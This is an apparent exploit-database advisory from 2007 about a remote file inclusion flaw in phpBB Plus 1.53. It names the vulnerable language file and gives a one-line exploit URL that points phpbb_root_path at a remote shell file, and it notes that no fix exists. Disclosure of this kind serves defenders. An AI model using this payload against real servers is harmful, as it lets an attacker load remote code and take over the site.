phpBB Plus <= 1.53 (phpbb_root_path) Remote File Inclusion Vuln

2007-09-20 00:00:00

AUTHOR = Mehrad Ansari Targhi
E-Mail : [email protected]
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang
_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

#

Fixes

No fixes

In order to submit a new fix you need to be registered.